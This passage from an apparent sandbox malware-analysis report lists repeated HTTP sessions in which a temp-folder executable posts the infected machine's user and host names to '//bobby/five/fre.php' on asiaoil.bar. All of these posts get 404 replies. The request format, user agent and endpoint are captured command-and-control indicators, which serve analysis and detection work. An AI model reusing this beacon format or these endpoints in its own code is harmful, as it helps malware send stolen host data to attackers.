                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:02.733601093 CET | 411 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lp2m%2FnL%2FD9YbbOQL75qiqY1QRie4l95Zh1%2F9JFc7ntQcAGF4IIGoKgD%2F4oPRxszoZK9oVvGOpnhqWzAxSgnH3OqLPGrbcPmuYuhePgMIcrCkD3ZE2%2Bku1MZOs6ktMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446c57aff90af-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        57 | 192.168.2.22 | 49222 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:03.670597076 CET | 412 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:03.686985970 CET | 412 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:03.758486986 CET | 413 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTMZeN6TFXbag2y1OBliS7F8Ve1jWw99EUBWoXAAGITxys1b9P94l43Uq0a%2B%2Fvyd8PfkcQkVRk9vtaYxi3J9PRjAhKWq89oNOgEI8T7X4pa5jNQ6EzOTmt9dPn8AJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446cbfd179273-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        58 | 192.168.2.22 | 49223 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:04.661405087 CET | 414 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:04.677716017 CET | 414 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:04.741179943 CET | 415 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ixohb6DjBvyEHcF0bBjTjwa28InQY%2BYLPlgexuM%2B84%2F6oOs4V7fazNyzJ4xoT6rgqB9hhVA18VkbtDdbf8imwrd%2Bcpfb9TH%2BBpi1dLQ9%2FLh%2BYjGvjuxWzsCeqqBpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446d23961910a-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        59 | 192.168.2.22 | 49224 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:05.954619884 CET | 416 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:05.970782995 CET | 416 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:06.040098906 CET | 416 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EE%2FH1l4X4mMaNy6pFboc6LUO8GAlkZzav%2FOZJIxi5sLykIm1li2uICH5vhNS6WFsxhSSyzMACuulnYIlnwvZpCsgsM7VNvUGg6SyBgvKaTyfwg7BclNEWkPSWBEWjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446da4ba95c32-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        6 | 192.168.2.22 | 49171 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:07.006112099 CET | 321 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:07.023216963 CET | 321 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:07.110586882 CET | 322 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:07 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mWD8oFcQTyd%2FKCuxdF4a9PY1C39C0%2FGNEfnX%2F9EktX8IXwXAk4CddsJG8chvleqV6%2Bl4Pe9X7pM9zS7OCYa1Qb%2B3%2FB%2BhM5NKwwPD%2BX%2FUskzFky%2FFOD%2Fvt045vN%2BQZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44569da6591e1-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        60 | 192.168.2.22 | 49225 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:08.596977949 CET | 417 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:08.613538980 CET | 418 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:08.680362940 CET | 418 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=glNfx46H3%2BbVLTKDrhap51MhlIRkcModymLBNBd7dZ%2Bl67BTPpZNpBIlfD8OgL00wxL3CdtX6qUD2pekmgxeoZGkVArQG2lmbN%2B57FmuOEvY0CiRqZc24nnj2bPcgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446eac805911f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        61 | 192.168.2.22 | 49226 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:09.667687893 CET | 419 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:09.683943987 CET | 419 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:09.773921967 CET | 420 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YpuHPmOjZQu3BJ71RrU5rE6ZD4gK%2FiddjmVX1894nkleKqaO0ZuA%2FZ4t0Hhr%2FEBANQiy%2F1dOteI5pqxTSy6LKaSwgoWmbo0Tuise9gruTiTrmWfL3ef0CFnSmrOP6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446f1795e8fd4-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        62 | 192.168.2.22 | 49227 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:10.711121082 CET | 421 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:10.727674007 CET | 421 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:10.805613041 CET | 422 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=263d7oWUNYmuRg8qalPaQG1rkbIXer23yE4CCwJl%2BycPuClpFI6FPf1gIeOZyF3Nt4DWuR0XxZA%2FK2Gwfg9%2FRUCXAmdrBxYU%2F%2FgwYdWQXfhfADT4oSnWfcr7aGjXFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446f7fa7290a3-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        63 | 192.168.2.22 | 49228 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:11.750458956 CET | 423 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:11.767074108 CET | 423 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:11.894766092 CET | 424 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rZcJVrDpVn0Jvm1Vx3izcMxx2xxi%2BRY0gOKUM%2BjgWD%2BYJ2bGoZJPCLIhbsX3VLB%2FEbDTmlKbO8MOV5p8OY13hTQVrNs14q81gtqG%2BYeK%2B7ujkKePtZGTix4rgIZT4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446fe7f4690fe-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        64 | 192.168.2.22 | 49229 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:12.826739073 CET | 424 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:12.843465090 CET | 425 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:12.954328060 CET | 425 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiz8VTs2nqW2CMp0oz2HdrtKIKW9o%2B7ImEcKl2VS1ifwy0ulNriRcW%2FuIGG1IoL3PiyPTyaWq%2BPUB82nqy1x%2F7uZPeiH7cbbBHoH7NU9xoGBLymRw5hquZwyAOhtcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44705396d911e-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        65 | 192.168.2.22 | 49230 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:13.916424990 CET | 426 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:13.934345961 CET | 427 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:14.009248972 CET | 427 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=meN57bW15OrovAiOaftPdPV%2BVu9aNc%2FmGkhf3DxgM8J7CqQPL97QEdbuifiRTAjK93npEn2xIesb%2FN5MC7%2B7xpKWknwpItKd6NXh4KBXOeDXxIfIsEdpLWRlGlrQsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4470c0b639142-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        66 | 192.168.2.22 | 49231 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:14.928308964 CET | 428 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:14.944510937 CET | 428 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:15.005187035 CET | 429 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLXoax8jkqv8eBPwf%2B%2FHkLStnp33pID1OGlxzxpw8mT%2BDJtVm%2Fko7dCOHPmAgnMB01wvsNPWgM%2BACIJ3McTTt4l4slPJE0ia9l6oA1b3jZBpZmUytzUvT6%2BsM8O8%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447125bf8911f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        67 | 192.168.2.22 | 49232 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:16.169338942 CET | 430 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:16.185606003 CET | 430 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:16.265043974 CET | 431 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:16 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gZJQzAkWL%2Fu0oyFSXQkAE19rOUvT86ounx%2F2nUfTZE5zhEaRM6VwUQCQNWwfitnmL12%2B1q8KR5pPRKomKLsKvLs0yZmFdrB49ckYXWQAh8%2FP4%2FjzcT6%2BgWMfOI%2Bcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4471a19969048-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        68 | 192.168.2.22 | 49234 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:17.425743103 CET | 432 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:17.442059040 CET | 432 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:17.529016018 CET | 433 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CVWgNT%2F3L1%2BppaTVgVDCxoKwuyVyVDAH6zVKoRJylnyRNyfDC2xX0Vm24lOeOSechfzcA1vgmVZNQs67XBF8JYV4Q8GGFRHDfBe2OCBaYxj7dDGPN3FxV3Y9%2Fs9AEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44721ffb76983-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        69 | 192.168.2.22 | 49235 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:18.783854008 CET | 433 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:18.800137043 CET | 434 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:18.911052942 CET | 434 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JkW3Yfq8929bkmz%2BZxma5WCDFCwlkkeMrZVjES5%2BGp19oTJDA%2FvVeGYB6q0J4yXwf6O8Ujd%2Bm4xURLIdmdWv80xluGmLKk%2BK5CnuxjOzH0TaS2jR2NsT%2BwpcvVu%2BPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
